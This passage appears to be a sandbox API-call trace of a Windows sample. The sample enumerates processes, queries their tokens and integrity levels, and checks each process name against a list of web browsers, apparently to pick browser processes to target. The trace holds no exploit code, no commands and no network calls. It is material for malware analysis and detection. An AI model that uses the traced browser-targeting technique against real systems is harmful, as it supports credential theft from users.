ReturnLength=0xfcfa8c) returned 1 [0237.102] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.102] CloseHandle (hObject=0x340) returned 1 [0237.102] CloseHandle (hObject=0x548) returned 1 [0237.102] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.102] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.102] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.102] GetLastError () returned 0x7a [0237.102] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.102] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.102] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.102] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0237.103] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0237.103] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0237.103] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0237.103] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0237.103] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0237.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0237.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0237.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0237.103] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.103] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.103] GetLastError () returned 0x7a [0237.103] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.103] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.103] CloseHandle (hObject=0x340) returned 1 [0237.103] CloseHandle (hObject=0x548) returned 1 [0237.103] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.103] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.103] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.104] GetLastError () returned 0x7a [0237.104] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.104] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.104] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.104] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0237.104] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0237.104] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0237.104] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0237.104] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0237.104] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0237.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0237.104] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.104] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.104] GetLastError () returned 0x7a [0237.104] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.104] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.104] CloseHandle (hObject=0x340) returned 1 [0237.104] CloseHandle (hObject=0x548) returned 1 [0237.105] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.105] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.105] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.105] GetLastError () returned 0x7a [0237.105] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.105] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.105] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.105] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0237.105] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0237.105] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0237.105] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0237.105] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0237.105] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0237.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0237.105] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.105] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.105] GetLastError () returned 0x7a [0237.105] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.105] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.106] CloseHandle (hObject=0x340) returned 1 [0237.106] CloseHandle (hObject=0x548) returned 1 [0237.106] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.106] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.106] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.106] GetLastError () returned 0x7a [0237.106] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.106] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.106] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.106] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0237.106] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0237.106] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0237.106] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0237.106] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0237.106] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0237.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0237.106] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.106] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.107] GetLastError () returned 0x7a [0237.107] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.107] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.107] CloseHandle (hObject=0x340) returned 1 [0237.107] CloseHandle (hObject=0x548) returned 1 [0237.107] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.107] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.107] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.107] GetLastError () returned 0x7a [0237.107] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.107] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.107] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.107] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0237.107] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0237.107] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0237.107] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0237.107] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0237.107] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0237.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x548 [0237.108] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.108] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.108] GetLastError () returned 0x7a [0237.108] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.108] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.108] CloseHandle (hObject=0x340) returned 1 [0237.108] CloseHandle (hObject=0x548) returned 1 [0237.108] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.108] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.108] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.108] GetLastError () returned 0x7a [0237.108] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.108] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.108] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.108] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0237.109] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0237.109] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0237.109] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0237.109] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0237.109] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0237.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x548 [0237.109] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.109] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.109] GetLastError () returned 0x7a [0237.109] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.109] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.109] CloseHandle (hObject=0x340) returned 1 [0237.109] CloseHandle (hObject=0x548) returned 1 [0237.109] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.109] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.109] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.109] GetLastError () returned 0x7a [0237.109] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.110] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.110] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.110] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0237.110] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0237.110] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0237.110] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0237.110] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0237.110] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0237.110] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0x548 [0237.110] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.110] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.110] GetLastError () returned 0x7a [0237.110] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.110] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.110] CloseHandle (hObject=0x340) returned 1 [0237.110] CloseHandle (hObject=0x548) returned 1 [0237.110] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.110] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.111] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.111] GetLastError () returned 0x7a [0237.111] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.111] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.111] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.111] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0237.111] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0237.111] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0237.111] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0237.111] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0237.111] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0237.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0237.111] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.111] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.111] GetLastError () returned 0x7a [0237.112] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0237.112] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0237.112] CloseHandle (hObject=0x340) returned 1 [0237.112] CloseHandle (hObject=0x548) returned 1 [0237.113] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0237.113] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0237.113] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0237.113] GetLastError () returned 0x7a [0237.113] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0237.113] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0237.113] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0237.113] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0237.113] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0237.113] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0237.113] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0237.113] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0237.113] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0237.113] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0237.113] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0237.113] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0237.113] 